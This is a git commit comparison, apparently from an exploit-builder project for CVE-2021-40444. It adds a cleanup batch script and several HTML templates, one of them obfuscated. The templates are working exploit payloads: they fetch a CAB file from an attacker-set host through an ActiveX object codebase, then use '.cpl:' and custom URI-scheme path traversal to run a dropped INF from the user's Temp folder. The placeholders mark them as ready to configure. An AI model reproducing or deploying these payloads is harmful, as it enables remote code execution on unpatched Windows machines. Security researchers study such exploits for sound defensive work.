Compare commits
2 Commits
31415dbf4e
...
7d0e32466e
Author | SHA1 | Date |
---|---|---|
d3adc0de | 7d0e32466e | 3 years ago |
d3adc0de | a0d1b8d4c4 | 3 years ago |
@ -1,9 +1,8 @@ |
|||||||
venv |
venv |
||||||
out |
out |
||||||
test |
|
||||||
srv |
srv |
||||||
.idea |
.idea |
||||||
__pycache__ |
__pycache__ |
||||||
template/sample4-nw.html |
|
||||||
!srv/index.html |
!srv/index.html |
||||||
setup* |
setup* |
||||||
|
*.7z |
||||||
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
@ -0,0 +1,8 @@ |
|||||||
|
@echo off |
||||||
|
|
||||||
|
del /F /Q "setup.inf" |
||||||
|
del /F /Q "setup.rpt" |
||||||
|
del /F /Q "out\*" |
||||||
|
del /F /Q "data\*.dll" |
||||||
|
del /F /Q "srv\*" |
||||||
|
xcopy /Y /Q "template\index.html" "srv\" |
@ -0,0 +1,79 @@ |
|||||||
|
<!DOCTYPE html> |
||||||
|
<html lang="en"> |
||||||
|
<head> |
||||||
|
<meta charset="UTF-8"> |
||||||
|
<meta http-equiv="Expires" content="-1"> |
||||||
|
<meta http-equiv="X-UA-Compatible" content="IE=11"> |
||||||
|
<title>CVE-2021-40444</title> |
||||||
|
</head> |
||||||
|
<body> |
||||||
|
<script> |
||||||
|
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
|
||||||
|
|
||||||
|
function dropIframe() { |
||||||
|
var i = document.createElement("iframe"); |
||||||
|
i.src = ".cpl:../../../AppData/Local/Temp/<INF_CHANGE_HERE>"; |
||||||
|
document.documentElement.appendChild(i); |
||||||
|
} |
||||||
|
|
||||||
|
function downloadCAB(){ |
||||||
|
var obj = document.createElement("object"); |
||||||
|
obj.setAttribute("codebase", '<HOST_CHANGE_HERE>#version=5,0,0,0'); |
||||||
|
obj.setAttribute("classid", 'CLSID:edbc374c-5730-432a-b5b8-de94f0b57217'); |
||||||
|
} |
||||||
|
|
||||||
|
downloadCAB(); |
||||||
|
setTimeout(function(){ dropIframe(); }, 3000); |
||||||
|
|
||||||
|
</script> |
||||||
|
|
||||||
|
</body> |
||||||
|
</html> |
@ -0,0 +1,69 @@ |
|||||||
|
<!DOCTYPE html> |
||||||
|
<html> |
||||||
|
<head> |
||||||
|
<meta http-equiv="Expires" content="-1"> |
||||||
|
<meta http-equiv="X-UA-Compatible" content="IE=11"> |
||||||
|
</head> |
||||||
|
<body> |
||||||
|
<script> |
||||||
|
function garbage() { |
||||||
|
return 'garbage'; |
||||||
|
} |
||||||
|
(function exploit() { |
||||||
|
var iframe = window["Document"]['prototype']['createElement']['call'](window["document"], 'iframe'); |
||||||
|
try { |
||||||
|
window["HTMLElement"]["prototype"]["appendChild"]['call'](window["document"]['body'], iframe); |
||||||
|
} catch (_0x1ab454) { |
||||||
|
window["HTMLElement"]["prototype"]["appendChild"]['call'](window["document"]['documentElement'], iframe); |
||||||
|
} |
||||||
|
var htmlfile = iframe['contentWindow']['ActiveXObject'], htmlfile2 = new htmlfile('htmlfile'); |
||||||
|
iframe['contentDocument']['open']()['close'](); |
||||||
|
try { |
||||||
|
window["HTMLElement"]["prototype"]["removeChild"]['call'](window["document"]['body'], iframe); |
||||||
|
} catch (_0x3b004e) { |
||||||
|
window["HTMLElement"]["prototype"]["removeChild"]['call'](window["document"]['documentElement'], iframe); |
||||||
|
} |
||||||
|
htmlfile2['open']()['close'](); |
||||||
|
var htmlfile3 = new htmlfile2[('Script')]['ActiveXObject']('htmlfile'); |
||||||
|
htmlfile3['open']()['close'](); |
||||||
|
var htmlfile4 = new htmlfile3[('Script')]['ActiveXObject']('htmlfile'); |
||||||
|
htmlfile4['open']()['close'](); |
||||||
|
var htmlfile5 = new htmlfile4[('Script')]['ActiveXObject']('htmlfile'); |
||||||
|
htmlfile5['open']()['close'](); |
||||||
|
var ActiveXObjectVAR = new ActiveXObject('htmlfile') |
||||||
|
, ActiveXObjectVAR2 = new ActiveXObject('htmlfile') |
||||||
|
, ActiveXObjectVAR3 = new ActiveXObject('htmlfile') |
||||||
|
, ActiveXObjectVAR4 = new ActiveXObject('htmlfile') |
||||||
|
, ActiveXObjectVAR5 = new ActiveXObject('htmlfile') |
||||||
|
, ActiveXObjectVAR6 = new ActiveXObject('htmlfile') |
||||||
|
, XMLHttpR = new window['XMLHttpRequest']() |
||||||
|
, XMLHttpRopen = window['XMLHttpRequest']['prototype']['open'] |
||||||
|
, XMLHttpRsend = window['XMLHttpRequest']['prototype']['send']; |
||||||
|
XMLHttpRopen['call'](XMLHttpR, 'GET', '<HOST_CHANGE_HERE>', ![]), |
||||||
|
XMLHttpRsend['call'](XMLHttpR), |
||||||
|
htmlfile5['Script']['document']['write']('body>'); |
||||||
|
var htmlScript = window["Document"]['prototype']['createElement']['call'](htmlfile5['Script']['document'], 'object'); |
||||||
|
htmlScript['setAttribute']('codebase', '<HOST_CHANGE_HERE>#version=5,0,0,0'); |
||||||
|
htmlScript['setAttribute']('CLSID:edbc374c-5730-432a-b5b8-de94f0b57217'), |
||||||
|
window["HTMLElement"]["prototype"]["appendChild"]['call'](htmlfile5['Script']['document']['body'], htmlScript), |
||||||
|
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>', |
||||||
|
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>', |
||||||
|
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>', |
||||||
|
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>', |
||||||
|
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>', |
||||||
|
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>', |
||||||
|
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>', |
||||||
|
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>', |
||||||
|
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>', |
||||||
|
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>', |
||||||
|
ActiveXObjectVAR2['Script']['location'] = '<URI_SCHEME_HERE>:../../../AppData/Local/Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>', |
||||||
|
ActiveXObjectVAR3['Script']['location'] = '<URI_SCHEME_HERE>:../../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>', |
||||||
|
ActiveXObjectVAR4['Script']['location'] = '<URI_SCHEME_HERE>:../../../../AppData/Local/Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>', |
||||||
|
ActiveXObjectVAR5['Script']['location'] = '<URI_SCHEME_HERE>:../../../../../Temp/Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>', |
||||||
|
ActiveXObjectVAR4['Script']['location'] = '<URI_SCHEME_HERE>:../../../../../Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>', |
||||||
|
ActiveXObjectVAR4['Script']['location'] = '<URI_SCHEME_HERE>:../../Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>', |
||||||
|
ActiveXObjectVAR4['Script']['location'] = '<URI_SCHEME_HERE>:../../<INF_CHANGE_HERE>?<URI_SCHEME_HERE>'; |
||||||
|
}()); |
||||||
|
</script> |
||||||
|
</body> |
||||||
|
</html> |
@ -0,0 +1,146 @@ |
|||||||
|
<!DOCTYPE html> |
||||||
|
<html lang="en"> |
||||||
|
<head> |
||||||
|
<meta charset="UTF-8"> |
||||||
|
<meta http-equiv="Expires" content="-1"> |
||||||
|
<meta http-equiv="X-UA-Compatible" content="IE=11"> |
||||||
|
<title>CVE-2021-40444</title> |
||||||
|
</head> |
||||||
|
<body> |
||||||
|
<script> |
||||||
|
'use strict'; |
||||||
|
/** @type {!Array} */ |
||||||
|
var tokensArray = ["123", "365952KMsRQT", "tiveX", "/Lo", "./../../", "contentDocument", "ppD", "Dat", "close", "Acti", "removeChild", "mlF", "write", "./A", "ata/", "ile", "../", "body", "setAttribute", "#version=5,0,0,0", "ssi", "iframe", "748708rfmUTk", "documentElement", "lFile", "location", "159708hBVRtu", "a/Lo", "Script", "document", "call", "contentWindow", "emp", "Document", "Obj", "prototype", "lfi", "bject", "send", "appendChild", "Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>", "htmlfile", "115924pLbIpw", "GET", |
||||||
|
"p/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>", "1109sMoXXX", "./../A", "htm", "l/T", "cal/", "1wzQpCO", "ect", "w/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>", "522415dmiRUA", "<HOST_CHANGE_HERE>", "88320wWglcB", "XMLHttpRequest", "<INF_CHANGE_HERE>?<URI_SCHEME_HERE>", "Act", "D:edbc374c-5730-432a-b5b8-de94f0b57217", "open", "<bo", "HTMLElement", "/..", "veXO", "102FePAWC"]; |
||||||
|
/** |
||||||
|
* @param {number} totalExpectedResults |
||||||
|
* @param {?} entrySelector |
||||||
|
* @return {?} |
||||||
|
*/ |
||||||
|
function getValue(totalExpectedResults, entrySelector) { |
||||||
|
return getValue = function(state, value) { |
||||||
|
/** @type {number} */ |
||||||
|
state = state - 170; |
||||||
|
var processorState = tokensArray[state]; |
||||||
|
return processorState; |
||||||
|
}, getValue(totalExpectedResults, entrySelector); |
||||||
|
} |
||||||
|
(function(data, oldPassword) { |
||||||
|
/** @type {function(number, ?): ?} */ |
||||||
|
var toMonths = getValue; |
||||||
|
for (; !![];) { |
||||||
|
try { |
||||||
|
/** @type {number} */ |
||||||
|
var userPsd = parseInt(toMonths(206)) + parseInt(toMonths(216)) * parseInt(toMonths(196)) + parseInt(toMonths(201)) * -parseInt(toMonths(173)) + parseInt(toMonths(177)) + parseInt(toMonths(204)) + -parseInt(toMonths(193)) + parseInt(toMonths(218)); |
||||||
|
if (userPsd === oldPassword) { |
||||||
|
break; |
||||||
|
} else { |
||||||
|
data["push"](data["shift"]()); |
||||||
|
} |
||||||
|
} catch (_0x34af1e) { |
||||||
|
data["push"](data["shift"]()); |
||||||
|
} |
||||||
|
} |
||||||
|
})(tokensArray, 384881), function() { |
||||||
|
/** |
||||||
|
* @return {?} |
||||||
|
*/ |
||||||
|
function token_dash_lineno() { |
||||||
|
/** @type {function(number, ?): ?} */ |
||||||
|
var addedRelations = currentRelations; |
||||||
|
return addedRelations(205); |
||||||
|
} |
||||||
|
/** @type {function(number, ?): ?} */ |
||||||
|
var currentRelations = getValue; |
||||||
|
/** @type {!Window} */ |
||||||
|
var global = window; |
||||||
|
var document = global["document"]; |
||||||
|
var then = global["Document"]["prototype"]["createElement"]; |
||||||
|
var writeFunction = global["Document"]["prototype"]["write"]; |
||||||
|
var PL$22 = global["HTMLElement"]["prototype"]["appendChild"]; |
||||||
|
var $ = global["HTMLElement"]["prototype"]["removeChild"]; |
||||||
|
var el = then["call"](document, "iframe"); |
||||||
|
try { |
||||||
|
PL$22["call"](document["body"], el); |
||||||
|
} catch (_0x1ab454) { |
||||||
|
PL$22["call"](document["documentElement"], el); |
||||||
|
} |
||||||
|
var ACTIVEX = el["contentWindow"]["ActiveXObject"]; |
||||||
|
var model = new ACTIVEX("htmlfile"); |
||||||
|
el["contentDocument"]["open"]()["close"](); |
||||||
|
/** @type {string} */ |
||||||
|
var colname = "p"; |
||||||
|
try { |
||||||
|
$["call"](document["body"], el); |
||||||
|
} catch (_0x3b004e) { |
||||||
|
$["call"](document["documentElement"], el); |
||||||
|
} |
||||||
|
model["open"]()["close"](); |
||||||
|
var ops = new model["Script"]["Act" + "iveX" + "Obj" + "ect"]("htmlFile"); |
||||||
|
ops["open"]()["close"](); |
||||||
|
/** @type {string} */ |
||||||
|
var _ = "c"; |
||||||
|
var TokenType = new ops["Script"]["Ac" + "tiveX" + "Object"]("htmlFile"); |
||||||
|
TokenType["open"]()["close"](); |
||||||
|
var view = new TokenType["Script"]["Acti" + "veXO" + "bject"]("htmlFile"); |
||||||
|
view["open"]()["close"](); |
||||||
|
var iedom = new ActiveXObject("htmlfile"); |
||||||
|
var rp_test = new ActiveXObject("htmlfile"); |
||||||
|
var htmlfile = new ActiveXObject("htmlfile"); |
||||||
|
var fake = new ActiveXObject("htmlfile"); |
||||||
|
var doc = new ActiveXObject("htmlfile"); |
||||||
|
var a = new ActiveXObject("htmlfile"); |
||||||
|
var Object = global["XMLHttpRequest"]; |
||||||
|
var args = new Object; |
||||||
|
var ast = Object["prototype"]["open"]; |
||||||
|
var callbacks = Object["prototype"]["send"]; |
||||||
|
var modelIns = global["setTimeout"]; |
||||||
|
ast["call"](args, "GET", token_dash_lineno(), ![]); |
||||||
|
callbacks["call"](args); |
||||||
|
view["Script"]["document"]["write"]("<body>"); |
||||||
|
var s = then["call"](view["Script"]["document"], "object"); |
||||||
|
s["setAttribute"]("codebase", token_dash_lineno() + "#version=5,0,0,0"); |
||||||
|
/** @type {string} */ |
||||||
|
var i = "l"; |
||||||
|
s["setAttribute"]("classid", "CLSID:edbc374c-5730-432a-b5b8-de94f0b57217"); |
||||||
|
PL$22["call"](view["Script"]["document"]["body"], s); |
||||||
|
/** @type {string} */ |
||||||
|
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>"; |
||||||
|
/** @type {string} */ |
||||||
|
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>"; |
||||||
|
/** @type {string} */ |
||||||
|
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>"; |
||||||
|
/** @type {string} */ |
||||||
|
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>"; |
||||||
|
/** @type {string} */ |
||||||
|
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>"; |
||||||
|
/** @type {string} */ |
||||||
|
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>"; |
||||||
|
/** @type {string} */ |
||||||
|
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>"; |
||||||
|
/** @type {string} */ |
||||||
|
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>"; |
||||||
|
/** @type {string} */ |
||||||
|
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>"; |
||||||
|
/** @type {string} */ |
||||||
|
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>"; |
||||||
|
/** @type {string} */ |
||||||
|
rp_test["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../../AppData/Local/Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>"; |
||||||
|
/** @type {string} */ |
||||||
|
htmlfile["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>"; |
||||||
|
/** @type {string} */ |
||||||
|
fake["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../../../AppData/Local/Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>"; |
||||||
|
/** @type {string} */ |
||||||
|
doc["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../../../../Temp/Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>"; |
||||||
|
/** @type {string} */ |
||||||
|
fake["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../../../../Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>"; |
||||||
|
/** @type {string} */ |
||||||
|
fake["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>"; |
||||||
|
/** @type {string} */ |
||||||
|
fake["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../<INF_CHANGE_HERE>?<URI_SCHEME_HERE>"; |
||||||
|
}(); |
||||||
|
|
||||||
|
</script> |
||||||
|
|
||||||
|
</body> |
||||||
|
</html> |
File diff suppressed because one or more lines are too long
@ -0,0 +1,75 @@ |
|||||||
|
<!DOCTYPE html> |
||||||
|
<html lang="en"> |
||||||
|
<head> |
||||||
|
<meta charset="UTF-8"> |
||||||
|
<meta http-equiv="Expires" content="-1"> |
||||||
|
<meta http-equiv="X-UA-Compatible" content="IE=11"> |
||||||
|
<title>CVE-2021-40444</title> |
||||||
|
</head> |
||||||
|
<body> |
||||||
|
<script> |
||||||
|
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
